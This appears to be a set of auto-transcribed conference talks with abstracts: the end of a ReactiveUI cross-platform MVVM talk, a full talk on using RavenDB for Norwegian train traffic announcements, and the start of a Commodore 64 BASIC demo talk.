little bit in the next level, right? So this is a one-way bind. It only goes from view model to view, right? But what it does, it will take, do things like you can register ways to convert between types. So like for example, in WPF, you don't use Booleans to say whether something is real or not. You say a enum type called visibility, right? So Reactive UI registers a bunch of default ones. There's a bunch of custom ones as well that you can create that lets you say every time I bind a Boole and the target property is visibility, just convert it for me. I don't want to think about it, right? So we can also bind commands, right? So we will take the do login command and bind it to the login button. And so we can describe using the same kind of, kind of plug-ins to describe how to bind to different types. So if I recognize that a type has a command and a command parameter property, I can bind to that. Or if I don't know how to bind to it, maybe I'll look for a clicked event. That seems like reasonable, right? Or like if I'm on iOS, I use touch up inside, right? Or, you know, we look for, you can register, you can teach Reactive UI how to do things for your particular UI framework. And we'll see an example of this in the demo. So that seems like exactly what XAML Bindings does. That's not very compelling. Let's do a little bit more interesting one. So because a binding, at least a one-way binding, is really like kind of the same as an IObservable pipeline, like a link query, right? We can take the source and the target and split them up and then do really interesting things in between them, right? So I've used this method called WinAny. So it tells me I put in this, you know, dots and text of what property I'm interested in, right? And it tells me whenever that property changes, right? So whenever search text changes, tell me about it. So I say, you know, WinAny of the search text, and I want the value of the search text, right? The other options are sender and property name. That's not so exciting. Almost value. There's only the interesting one. So where it's not null, I don't really care if it's null, like don't even tell me about it, right? And so we use this method, select many, because we're going to take, we have a sequence and we're going to take Google search, which also returns a sequence. I didn't show that in the list. And then flatten that sequence, because it's select many. If that doesn't make any sense, don't worry about it. But the moral of the story is that I can use bindings but add asynchronous things in the middle, right? Or really interesting things. Now that's a terrible idea because I'm doing non-trivial work in the view. I shouldn't do that. But you can. So, you know, you've given, been given a sharp set of knives. Use them appropriately and not chop off your own arms. So I've said that ReactView I can be used with all kinds of different places. Let's kind of prove it, right? So why not an MVVM WinForms app? Let's bring the late 90s back. So I'm going to reset to the earlier version of this so I don't spoil the surprise. Actually, it's not a surprise. It's in nothing. You can see me live get. Cool. So for different presentation at QCon that I present along with Eric Meyer, I wrote this WPF application, right? So let me show you what it does before I, before I set a start project. Where you go. So what it does is a color picker, right? There should be something on the screen because I didn't switch back to me. There we go. So one of the things that ReactView I introduces is this concept of like kind of, I call them either output properties or derived properties. So in this view model, we have, we'll show it to you. Yes, that's cool. A red, green, and a blue property, right? It's a view model of a color picker. That makes sense. You can set or get them. But this final color isn't really something you should set, right? It's really a derived calculation of red, green, and blue, right? And so we'll see how we do that in ReactView I. But the point is that we can describe how properties are related in the constructor. And here, you can see. So I've done a little trick. This is the cool part of this presentation that I spoiled earlier is that there's a service called TinI. And one of the things they let you do is you provided a color and it will give you a bunch of images who are kind of that primary color, right? And so I've taken the final color and then selected it into a list of images and then selected that into a loaded set of images. So let's see the code. So this is working in React in WPF. And so we do, this is some of the syntax, right? So we can say like, when any of red, green, or blue, select it into a tuple, right? We want to select that to take those ints and select it into a color, right? But sometimes those tuple is invalid, right? So if I type like 3 million into the text box, that's not a valid color. So ints to color returns null, right? So we're going to say where X isn't null, select it into a brush and then set it to the final color. So and we've got this one command, okay. And what okay, okay, graze out when the color is invalid. So now I can't hit okay, right? So the cool thing is I was able to unit test that, right? So when I write a unit test, it's going to look something like this. Like I'm going to try to set it to 255. I'll see that the color is 255. I'll try to set blue to 300, a garbage value, right? And so if I describe my entire UI in terms of these kind of tests, then I have like all of the logic of a UI but without actually having to design anything, like actually put together a UI. And it'd be testable, right? Like I could run these tests and make sure that they still happen. So I can say like, you know, if you spec out a UI and write this kind of design, you'd say like these kind of statements like we should change a color when the values change, right? And I can make sure that those happen in unit test. So that's really cool. So anyway. So you notice, if you know this icon, this is the link icon, right? It means that this file is linked from the WPF project. It's the exact same file. So I've got my Windows form. It's pretty cool. I hadn't done this in a long time. It took me a long time to figure out like how do I use the WinForms designer again? So let's see the code. So I'm going to set the view model to main window view model. I'm going to create a new one. And I'm going to use these bind calls, right? And so I'm going to bind these different commands. And so because it's WinForms and ReactUI doesn't technically support WinForms, I had to add a few things, right? And so to do that, I registered. So ReactUI has its own IOC container, just like MVVM light does as well. And so I had to adjust how to convert from a WinForms, WPF color to WinForms color, for example, or to how to bind to WinForms buttons, right? And so, yeah, and I think that's the whole thing. So let's hit go and see if it works. So I was far too lazy to try to do image loading inside WinForms. That's just too hard. Like, I've forgotten all of my Win32 knowledge. It just doesn't work. So the cool thing is this code is super boring, right? And it's basically the same as if I go into the WPF version, right? So it's really similar code. The only reason it's different is because it actually works a little different. But like, I made this message box pop up if you hit the OK button. But it's super boring. You can see it's right or not right really quickly. That's the idea. So any questions, comments, ranks? This sucks. It's awesome. Any opinions? So you tied to get this, right? So you tied to get the view and the view model with bindings. So that's, we're binding commands and we're binding properties. They're the two interesting things that we're connecting together. And so we can also run custom code. So I can say like, whenever the view model changes do something, right? So like WinAny.subscribe, which would be an RX thing. So I can do, I can run arbitrary code in the view. And then certain, you know, certain code belongs in the view, right? Like things like focus or scrolling, scroll position, is all view related things. So you'd have to do that in the view, right? This approach is also really interesting. So for example, this is always a problem in MVVM, right? Is that you want to do something, you want to, you register a command in the view model, but that command really does a view related thing, right? Like showing a message box. You wouldn't want to show a message box in a view model because you can't, it's untestable, right? And so people who do MVVM always end up with jumping through hoops like weird kind of things to try to get around this. But in React to UI, it's really easy because commands themselves are events, right? They're I observables. I can subscribe to them. So I could have the OK button in the view model, in this case does nothing, right? But in the view, it pops the message box, right? So oftentimes in React to UI, you'll find you're defining things that in the view model do nothing, right? But they're only a view related thing. But you can still test it because I can pretend to hit the OK button and make sure there was hit in the unit test runner. So it's a brief introduction to Coco. I'm going to try to teach you all of Coco in like five minutes. Get ready. So Nibs or they have the extension XIB, but if you call them Zibs, then people laugh at you in the Coco world. So you have to call them Nibs. Nibs are just like XAML files, really. XAML files, if you really think about what they really are, it's just like a serialized list of objects, right? It's objects and a bunch of properties and it's going to set up those properties when the XAML file is loaded, right? So when Nib file is the same thing, right? It's a set of objects and then when it calls this method, it's going to load all those objects and then set them up for you, right? And then just hand them to you. So the framework reads them, reads this Nib file or XAML file, creates the object and then hands it to you. So instead of controls having events, they have an object that receives the event. That's called a delegate. And so it's really confusing because.NET and Coco use the same terms but mean different things like what they call a protocol. They mean an interface and when they say interface, they mean class. It's very confusing. So what that means is instead of you having a button and that button having a clicked event, you provided this object called delegate which is kind of an interface, like a.NET interface and that object has a method called clicked, right? Does that make sense? So you handed an object with a bunch that is essentially your list of event handlers, right? And then the button will call that object. So they use this pattern called MVC which is the way that they do MVC is not ideal. Let me show you why. So these are all quotes directly from the Apple documentation. So controller objects are conduit through which view objects learn about changes in model objects and vice versa. That sounds pretty cool. Controller object interprets user actions and communicates new or changed data in model. When model object change, a controller object communicates a new model data to the view objects so that they can display it. I'm feeling it. Controllers directly reference UI controls through outlets to fiddle with their contents. We were so close. So the problem is that Cocoa controllers, now if you're good with Cocoa you can get around this, but by default Cocoa controllers will directly edit text like UI controls. So they're not testable, right? You can't new up a controller in a test runner and then play with it, right? Because it will demand to create Cocoa objects and those Cocoa objects will freak out because they're not in a real window. So the C in MVC, at least in Cocoa, you treat like the XAML code behind, right? So you just write, you pretend that that's view code and you write only view stuff in there. So that's in reactive UI. That's where we're going to put all our bind calls and our one-way bind calls. So how could we take MVVM and apply it to Cocoa? It turns out we have a project that kind of proves that that's true. So this is GitHub for Mac. So GitHub for Mac, these days is written in an MVVM style using an MVVM framework called reactive Cocoa, which is kind of the objective C version of reactive UI. It's super exciting that they actually ported all of the reactive extensions and reactive UI into one library. And so they use it and they use MVVM too. So they have unit tests of UIs and get the same benefits. It's very cool. It's very cool that GitHub for Windows and GitHub for Mac are written in two completely different languages and two completely different platforms yet are philosophically written the same way. I'm kind of excited about that. So let's prove it. Go away Visual Studio. We're going to fast forward. This is the wrong project. So this time I must confess I had to cheat a little bit because I had to modify the view model to make this work by a bunch of hash of monos. So the thing is that your view model might not be 100% portable, but it's pretty close. I unfortunately picked a terrible example because it's all images and colors, the two least portable things on the planet. Apparently every UI framework has decided that they are not, everyone else is wrong about how to define red, green, blue and alpha and they need to define themselves. The other thing is on Windows we used the HB client but that doesn't exist until recently on Xamarin.Mac. So I had to use RESTsharp. So I had to rewrite that code. So you'll see a big ifdef. This code is magical. Don't worry about it. Yes, it's magical. But a lot of the same things still happen. This Winini is the same. This is mostly the same where I do this crazy, crazy selection to select a color into a list of images. So let's look at the interesting part. So every most Nib files will end up with the Nib file and the controller file, the controller for that view. So it's the main Winini controller. You see the default things. Away from Nib is where we write all of the same kind of code. We're writing bindings. I had to do similar tricks to make React to UI understand Coco. Although Coco is a platform I want to support so it will actually in React to UI 5 not need nearly as many of these hacks. So the hacks are like, for example, detecting on an NS text field when the text has changed, which is apparently a non-trivial endeavor. Which you think it wouldn't be, but apparently. NB notabene and Coco is weird to create like a border that had a background. I had to create like a core graphics layer and like change a layer. It was weird. What the point is this is all view specific code. It's not my view model. I didn't have to clutter my view model with these very view related concerns. So the cool thing is in Objective C and Coco, I was able to do the image loading. This is zero. So the okay button will also gray out, right? When I typed in a garbage value. And this is pretty cool. I'm not smart enough to do this at all. But this comes for free with this NS collection view. Snazzy. So what I mean is to share the same view model between them, right? Mostly. And it turns out you can do this on like pretty much every platform. Like I've worked on just starting Android support. And it works as well there. It's very cool. So that's all I've got. GitHub slash reactive UI is reactive UI. Reactive Coco is at the same place. Only replace the word UI with Coco. My name is xpulbetsx on Twitter because back in high school that was cool and now it's not and I have infinite regret. So yeah, questions, comments? Android works there too. So I just on the plane flying over here, I got the unit test runner running on Android and they almost all passed. So Android, a lot of the like nice features that are present on other platforms and reactive UI aren't there yet. So like for example, reactive UI is good at binding to lists like items controls. And on Android you should be able to do that too but we're not quite there yet. So but you can certainly write this code yourself. It's kind of like just like convenience things that are missing. So. Yeah, yeah. So if you're doing, if you're just like doing line of business applications, you're loading stuff from a database, you're like saving it to, you know, cash or whatever, all that stuff can be shared. And that's really, really interesting. So especially, so I write this other library called AcroVash. And so AcroVash is a library for, it's kind of like Memcash D for desktop applications. So like anything you download will be thrown in, you throw it into a cache and then you act as if you're never, you're always fetching things from the network but it like goes faster once it's cached, right? Like so. And it's always synchronous. It's, you know, it's designed for desktop and mobile applications because I couldn't find any library that was like, it's caching is all web. Every interesting library is on the web these days, you know. Nobody writes desktop applications anymore. Yeah, so they're all free. They're all free and open source. So you can always crack open the code and take a look. So with that you can write cross-platform serialization of state, right? Like loading, saving state, loading, you know, and saving stuff you got from the network. And so that makes it so you can really use a lot of your application logic if you can have cross-platform state basically. Say it again. Yeah. Yeah, so that is supported in everywhere except for Android where it's very hard to do view model based routing. So routing, for example, you can say like, I'm on a page and you can say like, go to this view model and then some code in React View Eye looks up the view associated with that view model, right? So you just say I want to go to login view model and then it says like, okay, let me find a view that fits, right? So yeah, that works on Cocoa and iOS. And iOS even has a built-in navigation controller that follows around the view models. So like navigation controller is the standard like bar at the top with the back button and the alternate button. And so, and it works great on Windows Phone and Windows applications too. So yeah, routing was a thing that I didn't mention in view location. So for example, so the idea is that you just put a generic control on the screen and then say like, here's the view model and then it'll look up a view associated with that view model, right? And then move between them. It's really useful for lists because then you just provide it a list of view models and it's like, okay, let me display, figure out the views that go inside these tiles, right, in a list. I know, it aims control for example. So it means that your views become almost even more boring because it's only the content. You don't have any like dummy views that are just like, hold the list box, right? Cool. All right. Well, thank you so much for your time. I'm sorry that it's not DDD in CQRS but I hope it was so interesting. Yeah, thank you so much.
|
In this talk, learn how to use the Model-View-ViewModel pattern to write testable user interfaces on platforms beyond XAML-based ones. With ReactiveUI, an MVVM Framework that is designed for cross-platform applications, you can see how to write ViewModels that run on iOS, Android, and Windows, while still creating native experiences on each platform. Specifically, we’ll dive into Cocoa / AppKit, and see how to wire up ViewModels to Cocoa Views and ViewControllers, using the same syntax as in a WPF application, providing an amazing potential for code reuse in cross-platform environments.
|
10.5446/51489 (DOI)
|
So, I think it's about time to start. Welcome to everyone. Nice to see that there are so many here. So my talk is running with Ravens and nobody is surprised to hear that that will include RavenDB. Great. So, a little bit about me. My name is Pei Fruller Pedersen. I work at Buve as a solution architect. So I build software systems and I'm going to talk about one of the systems we have built today. So, a little bit of contact information if somebody wants to get in touch with me afterwards. Okay. So let me just quickly start by telling you about what we're building. So, can anyone see something that's out of place in this picture? Something not supposed to be there? So, this is 60s technology and an iPad. So, the system we're building is here. So, we're building a system for publishing train traffic announcements. This is a system for the Norwegian directorate of railway services called Järnbanverke for all Norwegians here, which is everyone. So, I guess most of you know that Järnbanverke is building infrastructure and then we have a lot of train companies running trains on that. So, one example of what we're doing is distributing train routes to train drivers or a list of trains passing through a train station and so on. There's a lot of things happening on the tracks. You can have speed reductions, you can have power disconnections, you can have track work running quite frequently. So, all this information needs to be sent to everybody's working on the tracks. So our scenario is that we are supposed to build a portal for announcing up to 2,000 trains a day. That's every train running on the Norwegian rails every day. We need to announce all the infrastructure changes and all the track work. And we need to tell about this to the train drivers to notify between the different train dispatch central to the station manager and to the railway companies who own the trains. So, I'll try to illustrate one of the difficult things we have to solve here. So, here's an example of two trains. There's train L3, local train and there's train 5510, which is a freight train. So, what we need to get from the system is the driver of train L3 needs to know about all the stations he's running through. The driver of train 5510 needs to know about all the stations he's running through. The station manager at Rua station needs to know about all the trains passing his station. VMA station, for those who know their local geography, belongs to Bergen dispatch central. These stations belong to Drummond dispatch central. So, everything passing through there needs to be notified to Drummond dispatch central. And this great purple, big purple section is stations belonging to Oslo dispatch central area. So, so far so good. Some different roles needs to know about different parts of the train as it passes through. So, let me add a little bit of complexity. There is speed reduction at Rua station. So, now we need to know, now the train L3 driver needs to know about this. The driver of train 5510 needs to know about this and the station manager at Rua station needs to know about this. But we don't want to tell this to, sorry, Oslo dispatch central area needs to know about this. But we don't want to tell about it to the Bergen dispatch central because it's not relevant for them. So, we try to protect them from information they don't need to know. Same with Drummond dispatch central area is not involved in this happening. So, we want to filter it out of their scope as well. So, this is one of the problems we needed to solve in this case. So, we made a list of the things we needed for a system that could handle all these things via portal complex query logic and so on. So, and we decided what we need is something that can help us work fast and effective. So some kind of data store that we can store our trains in and to be able to store them into the portal. And we needed something that was optimized for reading because this is a 99% read scenario. We needed something that could handle quite complex filtering logic and query logic. And we needed something with high availability support. So, this was our, this was the abilities we were looking for when we started to look at Raven. So, Raven is, as most of you know, a schema less database that stores its documents as JSON. You query it with link, which is a familiar syntax for most of the developers. And it has built in replication support which we could leverage. So, the architecture we tried to set up with RavenDB was something like this. So we have a registration system that handles announcements either through forms or imported from other systems, which we publish to our portal. So the publishing is going through a load balancer and hits one of two RavenDBs which have replication between them. So, and for each RavenDB instance, we have a web server instance that will, that pulls its data from the specific RavenDB instance. So this means that we have a quite easy setup. It's a lightweight web application. It pulls all its data from a local store on the actual web server. And the only data we keep on each web node is current data. So things we need to display here and now. Most of our data stored for historical reasons is in a SQL server over there. So that's also where we handle changes and updates and logs and stuff. So now I've presented our scenario and I want to show you some, how we solve some of the practical things. So down the rabbit hole or into the tunnel. I have three things I want to show you today. It is about how we solve the read optimized scenario, what abilities we were using and what abilities we chose not to use. I'll show you how we do a couple of queries that are not obvious. And I'll show you how we solve the high availability issue. And since this is announced as an intermediate talk, I will try to show you something in every demo that you won't get in a beginner level talk. And something that's not simple to read from the documentation. So I'll get to it. So the first scenario, the optimized for read scenario. This is partly handled with, by the way, you model your documents. So we model documents as a denormalized model. So everything we need for one train is in one document. So we can pull out the whole train route in one go. But after looking at the data for a while, we found that some of the data changed for different purposes. So that means that we do want to put some of the data out in different documents, despite wanting to denormalize most of it. So I'll show you a little bit about that in a while. Another important property of a document is the document ID. So every document has an ID which you can use to load the document. And that's really how you pull out existing documents from RavenDB. That means that you can reference one document from another document just by putting the ID of the other document in the first document. So to be able to support that, we've been thinking about how we model our IDs. So a difference from a traditional SQL Server database where you often use surrogate keys to be able to change things. We're trying really hard to use domain concepts in our IDs so that we have predictable IDs because that makes it easier for us to do updates later. We can change things from another part of the application because we know something about the train we're talking about. So for instance, a train route is modeled with the date and the train number in the ID because that's universal truth that never changes. So time for my first demo. So this is the basic, can everyone see this? In the back? This is a really long room so I'm not really sure. So this is how you load the document. We have set up a document session and I can do a load of a document type and provide an ID. So basic stuff. So I probably haven't started my RavenDB instance which I'm going to demo against. Let me do that first. I'm running Raven in debug mode here to get the output log so that we can go into the log and see what's happening in the RavenDB. Most of these are from Raven Studio. So Raven Studio looks like this where we have all the trains and we have collections of different types of announcements that we're providing to the train companies. I'll get more into that later. So when I'm loading a document, it looks somewhat like this. This part readable. So what you can notice here is that we have a station ID in a property and we have a station property which doesn't have a value. Station is something we modeled out of our domain because the details of a station is they will change. There's a database for them but it's not updated. The quality of the data isn't good and we know that there's a project to improve that data. So we know that this data will change for different reasons than the original train. So that's a reason for keeping that specific document out of this structure. So the way you can, the way we can add the details to this document is just to loop over all the train station process in the train route and load the document for each station by submitting the station ID. So if I do that, I'll get a new document where I have the station put in, station details merged into my original document or into my object, really. But what happens now is this. So I'm loading my train route but it's actually doing one request for each station on the route and that's not really optimized and indeed RavenDB protects you from doing that kind of mistakes. So say I had a train that was passing through 30 stations instead of 20 stations, small simulation here. What would happen then is that this query would actually fail because RavenDB doesn't allow more than 30 operations per query. So then you get a nice error message like this. Maximum number of requests allowed. So the way you solve this is by telling RavenDB when you load the document to include all the station details in the same query. So that looks like this. And here's a small trick that you will have, that is not obvious in the documentation because I'll just run it so I can show you. Because what I'm now doing is I have the station details ID represented in a collection in my document so it's one level down. So the include command supports lambda expression where you can set up properties but you cannot give it subpaths to documents in a child collection. So that's what this common notation does. So my bad. If I'm selecting something in this window I'm actually blocking the RavenDB process. Beware of that when you do RavenDB in debug mode. So what you see when I do the include here, as you can see this is a recurrent property in a collection. So it happens many times. So this common notation solves that. And if I go back to the console you can see that it's actually doing just one query now where it's loading a document and including all my stations. Try not to do that mistake again. So okay. This works. Include. Yeah. So a little bit about a few different types of indexes. So indexes is how you get data out of RavenDB without knowing the ID of each document. So RavenDB has a search engine where it indexes some properties from each document and stores them in a Lucene index which you can query against. And that will pull out the document ID and Raven will load it in the background. But it's still loading by ID. It's just querying a Lucene index first. So I'll talk a little bit about the different types of indexes, how you query indexes and how we do testing on the indexes. First of all, some of you may have seen the RavenDB demos, like introduction demos. So what you'll know there is that they often don't add any indexes. They just put one or two documents in RavenDB and it will generate its own indexes based on the queries you're using. That works fine except that index creation in RavenDB is a really slow process. So when we put 500,000 documents into it here, the indexing would actually take in excess of 15 minutes. So for 15 minutes you would not get answers to your queries. That's really not how you want it. Especially if you lose your RavenDB service recycle for some reason, then you would lose the index and it would have to start rebuilding it again. So those dynamic indexes are really cool, but I would not recommend using them for a production system. So what you then do is you create the static index, which is a class that you deploy to a class definition with a link query and a map expression that you deploy to your RavenDB. So RavenDB will then convert that link expression to a Lucene index in the background for you. So from that expression you can actually calculate new values in the index and you can store these values only to the index and not to the document itself. So that gives you even more flexibility over on things you can query. And when you get back a query result, you can project the result to new types. So I'll show you a demo about that also in a second. Yeah. So next demo. There's going to be a bit of demos. So the next part is I'll show you quickly how to do a simple query. Another tip, quite often you'll see that the RavenDB query object called with this index has a string parameter in here. A lot of places in the documentation it's used like that. And if you use that syntax, you will lose out on refactoring support. You will also lose the ability to go and look at the index in a simple way just by navigating it. So navigating directly to the class. Here's an index, it has a map and the map contains a link expression which creates a new anonymous object and the result of this query will be stored to a Lucene index. So this is the simple query where we just query a specific index. And we give it our parameters and run it. So there's result will be something like this. This is a real query that we use in our application. This lists up all the trains passing through Honefo Station during the day. So this is the worksheet or work list for a station manager at Honefo Station. But in our application we have a lot of different types of announcements. We have for a train you have the train route but you can also have cancellations. You can have partial cancellations connected to the train and a train can even be partially cancelled multiple times. So you can be cancelled in the beginning and in the end at the same time. So what we do then is we need to extract every document that is related to the train in some way. So that's what this interface is. So this implements different, we have different document types that implement the same interface. So by creating something called a multi-map index like this, where instead of a map expression you do add map. So you can add the query over the same, you can add an index which contains the same fields but from different document types. That means you can query over the same docus or you can query over different objects with the same properties. So if I run this demo, what you'll see here is that I'm doing one query and I get back a list. I'm doing one query with one train number and a date and I get back a list of objects which have different type. So these have different properties. I can do different things with them. So what I want to show you next is how we can take those different documents and project them to the same type because some users wants to know the differences between these document types and some wants an aggregated view. So for instance the train dispatch central, they need to see different documents presented in the same way. So what we do here is that we do the same query I just did but then we project the result to one type. So instead of setting up mapping of two different types and running that afterwards, we do that as part of the Raven query. So we'll get out. So if I run this query now, what I'll get out is a list of documents of the same type. And you can see here that they have a few common properties. So one thing I can do from here is that I can set values into the index. So what I'm doing here is I'm setting an announcement type which is the base document type. This is just to show how we can do calculations or calculate the fields and store them only in the index. So what I'm doing here is that I'm actually printing the announcement type out here but there's no value there. And that's because to use this, to make sure that this value is persisted, you actually need to specifically store it in the index. So if we're talking about the stock type. Store. So what I want to store is the index.t type. And that's field storage. Yes. Then I need to make sure that my indexes are regenerated. And regenerating indexes is something you often only do on deployment time because as I said earlier, index creation is quite a tough task. It takes a long time. So what you see now is that when I run this in this query, it returned but it didn't return any results. And that's because the indexing is still going on. Let me see here, so the way you can see it is down here. No, you can't see that. It's way down here. But the Raven Studio actually has a monitor of indexes and the indexing process and you can go there and see if any of the indexes are still. I'll show you more details about that when we get to the topic of testing indexes. So if I run this again, the index should be created and should be complete and I get back the same result. But now these properties are stored to the index and I can retrieve them as part of my projection. So, yeah. So I've shown you, you've seen a little bit of how we query the code in RavenDB already. So you can query it with link expressions or if you have an advanced query which is impossible and which you cannot express with the link syntax, you can go down to the Lucene API and query it using Lucene directly. If you do queries in Raven Studio, you always use the Lucene in the syntax. So to work effectively with RavenDB, you need to know the Lucene syntax. I'll show you a demo about that too. So here's an example. So as I told you earlier, we have a train dispatch central that needs to monitor parts of a section. And we have infrastructure changes that can happen at one station or between two stations or it can span a list of sections which goes between many stations. So we need to know if any of the stations included in this infrastructure change hits any of the stations that we're currently monitoring. So this means that we need to find out from a query if a station is, if one collection contains items which is in another collection. And to look into collections, RavenDB has a specific keyword or link extensions which is called in, but that takes a list. When we're querying against a list of strings, then this expects a list of strings. And indeed, there's really no way of expressing this particular query in the link syntax. So let's just give up. And show how you can do it. So now we fall back to the Lusinia syntax. And we do that by using a Lusin query instead of a normal query. This is a design issue. The Lusin query is not directly on the session object. It's in an advanced property. So you will already be notified that this is something you need advanced. This is an advanced feature. Don't use it if you don't know what you're doing. Another part of RavenDB is make sure that you understand what you're using this for. But when you get down to the Lusin syntax, there actually is a way of expressing this quite easy. When you supply a collection of a list of strings to the in property in Lusin, it will actually match items in each collection against each other. And then this suddenly became a really easy query to do. But once you've started a Lusin query, you need to complete it as a Lusin query. There's no mixing between Lusin and link. So Lusin queries are, well, here's an example of the syntax. So you give a property and then a few special values. So here's a null value that actually is a value. And times need to be specified in this format. And you can do time intervals specified as an expression that ends in star. So if I run this, I get, I see that I have two infrastructure changes that match this particular section area. So I'll get a hit for those. Should probably demo that I can't do it without. But there's here's the Lusin query. You see the in syntax here. So you can't see that. Sorry. Can you read this text? No. I'll make it bigger. That better? Great. So here's the translation when you actually do the query. What you can actually do is just copy this into Raven Studio and run it there. So this is a way of debugging your code or your queries. Thank you. So next subject on indexes is how we're testing them. Raven DB is designed to be really testable. The way they recommend that you do testing is that you host an embedded Raven DB in your tests. I've even heard that if you don't do it that way, somebody will yell at you. So yeah. So I'll show you how we set up our tests. First of all, all our Raven tests are just inherited from a base test class, which does all the setup for us. So what this does is it sets up the embedded Raven store and instructs it to run in memory. And then since this is created for every test, we need to deploy all our indexes. And then we open a session that we can use in the test. So once we get to the test, we have an empty Raven DB, which we need to preload with the data we need for our test. So what we do then is we create the documents that we need to store in Raven DB and store them there and save the changes. And we're ready to start our test. So here I'm just doing a simple query in the test. But what we normally do is to call our controllers or other services that use Raven sessions directly and just give them the test session that we've created. So this means that we can do quite big scenario tests on our, without faking too much, we're actually running it on a real Raven DB. So if I run this test now, I've added the document. I've created a session and I query it and I get nothing. So why is that? That's because the indexing takes a while. If you have one index, you probably won't notice this because the index isn't that slow. But once you get to 20 indexes or more, then this is something that will happen in your tests. So what we do then is to make sure that this document that we stored in the setup has been indexed before we start running our tests. One way of doing that, I'll show you how you can check for this first. In a query, I can add statistics so that the Raven DB will tell me something about the query I'm doing. And if I print that statistic, like this, I can have it tell me if the index is still or not. So if I'm running that, it will tell me that the index was still, so that I need to wait more. So there's a way I can do that for all tests. I can set up a query consistency convention. So what this does is it instructs Raven DB to make sure that everything I've written to Raven DB is indexed before returning any queries I do in the same session. So I add this to my document store and rerun the test. And now the test will take a little bit longer because it will wait for the index to be non-stale. So here's non-stale and it's ready to run. It's still pretty fast. Yeah. So it's not a big delay. And by doing it this way, instead of doing a loop while non-stale, it's actually a Raven DB itself that determines whether the index is non-stale and returns control to you. So it's more transparent. Okay. So the last scenario we were looking at is how do we do high availability. So as I mentioned in the architecture, what we're doing is we're setting up two web nodes where we make Raven DB replicate between the nodes. So each Raven instance is always updated with the latest information. That means that we can just add a new server, set it up as a replication target, and it will, it's ready to be used. One thing to be aware of is that when you have replication, you will have conflicts. So they need to be handled. So what we're trying to do here is to solve all our conflicts with domain rules. So we have very few writes. And since we're refreshing our view quite frequently in the short while after each write, so if the write fails because of a replication conflict, we will actually throw away the change and refresh the view and it will appear to the user as that the registration failed for some reason and he will need to redo that. So I'll show you quickly how we do that. So what I need to do then is to set up a new Raven DB server and that's as simple as just unzipping an exit file, starting a new server instance. So this is a new Raven DB. What I need to do here is to add the database and add replication support. Replication support is a creation-only setting. So you need to do that when you create the database. You can't add it later. So I've added the database. It's right now quite empty. So what I can do now is go back to my first database and add the replication setting to this one. So I'll set up the URL, put it here, specify the database name and save the changes like this. And so now I go here and look. This should pretty soon start to populate with documents. I hope. Save changes. Replication statistics. Yeah. So now you can see that the documents are trickling. Takes a bit of time. So while those documents are trickling in, what I can do is I can set up a new web application which is just a copy of the original one. And I can start that. So this is how we set up a new node to run the application. This is the RavenDB store and the web application. And once the RavenDB application is done migrating data, I can start using this application. So right now, if I do it like this, you can see that I have 11,000 documents and all my indexes are stale. So I might not get answers to the queries I'm doing. And since this indexing process takes quite a bit of time, I might not even get to where I'm to the point where it's updated and I can do queries against it during this session because I have something like 10 minutes to go. So I can, no stale. It's ready. So what I can do now is I can try to find the route for train number 1014, which is the one I used in my original demo. I can fetch that. So now I have a new node, replication set up and done. I'm already running it in another web instance. So setting up a new node in the portal is how much time did it take? Three minutes. So that's a... Now we have load balancing failover and we have a really fast way of setting up a new node if something should go down. So this sort of solves all our requirements for high availability. And now our little application is on the road with the trains. So to sum it up, RavenDB has been a really benefit to our development process. It's easy to set up. It's really easy and fun to use and my team is nodding down there so I'm pretty confident about what I'm saying here. It provides us with speed, power to do complex queries and failsafe support. And if we have wanted to build that ourselves for this kind of web scenario, we would have to do a lot of work. And it's really fun to work with. I have roughly five minutes to go if somebody has any questions. It's Friday afternoon and everyone is tired of a long... Yeah, sure. After replicating the database, change the document. What I didn't show her is that I would go to the new node and set up replication back so I would have a master and master replication scenario. So that means that if you change the document in either of the databases, it will update each other. Yeah. Yes? Anyone else? Okay. So to repeat, I am Peugeot de Pedersen. Thank you for joining me tonight. And have a nice day. Thank you.
|
What happens when you put all trains for an entire year into a document database?How can you find out where the trains are running, when they are sceduled to arrive at a stop, what trains are passing through a particular station? I will show you how we query across millions of trainstops fast with high availability when data is stored in simple JSON documents. This talk will feature several advanced technicques such as mapping and reducing, indexing across documents, related documents and other features we use to make sure that trains can run on time.
|
10.5446/51490 (DOI)
|
Hi, Somer Fraan Norge. Good. I don't speak any Norwegian. That's the single line that I can actually speak. I just wanted to sort of say, you know, what the audience is going to be like. And I'm guessing most of you are from Norway. But I did just to make you feel comfortable also put my title slide into Norwegian. I have no idea if this actually translates properly because this is Google Translator Action. So that's as far as I'm in Norwegian goes unfortunately. It's good. You might know so it doesn't have the profitable in it. I thought maybe that might not quite work so well. So I've just stripped that out of it and you'll see why as I go along. But I had another speaker actually come up to me and say, because they knew what my talk was going to be like. And they said, you know, you have to be careful with Norwegian audience because they don't always interact very strongly. And I usually have like an interactive kind of element in my talks. And I thought, it's a load of nonsense. So, you know, if I start picking on you and pointing at you then unfortunately you might have to say something. But I thought I'd go online and just see what typical Norwegian kind of group of people would look like. And unfortunately this is the closest that I found. But I don't think they're actually representative of the entire question. But that's as far as I got. So who owned one of these? A few people. What was the Norwegian equivalent of this? Did Norway have its own microcomputer type thing? Because we had in the UK a BBC Micro which was like made by the BBC and that's what we had at school. But was there a Norwegian computer, anyone? There was. What was it called? Tiki. T-I-K-I. And they're still like people that collect those and, you know, still have kind of events about them and stuff. No, you're not one of them then. No, you're not one of them then. It was originally meant for the media. Ah, cool. So yeah, it's cool to see that Norway had that as well. Because, you know, we had that in the UK and I think France had their own and now obviously we're all just using the same stuff all over the world. And it's a bit boring really. But what I want to do is actually want to go back to the past and because, you know, I'm British from the land of Doctor Who, I actually want to bring in a Commodore 64 for some action. So if you ever did code, you know, on a computer like this in the 80s, you'll probably remember that you could do stuff like this. Assuming it's actually running, of course. Which for some reason. It doesn't seem very happy with me. What I'm going to do is reset it. That's funny. It all worked in my test, of course, but it doesn't necessarily mean it's going to work now, does it? Right, unfortunately it puts in this really horrible mode that makes it look like an old screen. But never mind, you can make that out, that's good. So you might remember that you could do stuff like this, really boring stuff. But something else you could do is you could print out individual characters based on their ASCII value. So obviously we all know 65 is A, it's kind of boring as well. But the Commodore 64 had always kind of extended codes, a bit like the PC does. Sort of the extended ASCII set that would allow you to draw blocks and lines and things like that. And two characters in particular, 205 and 206, which allow you to draw a left line and a right line. You think, okay, that's kind of boring. So what I'm going to do is I'm actually going to create a program that, rather cleverly, will randomly jump between one or the other. So if I run this code, and this is yes, good old fashioned line numbers here. If I run this code it will either print out a left line or a right line, like so. And just to kind of make it really cool, I could go 20 and go to 10. If you run this, it's not going to be that interesting. It's just loads 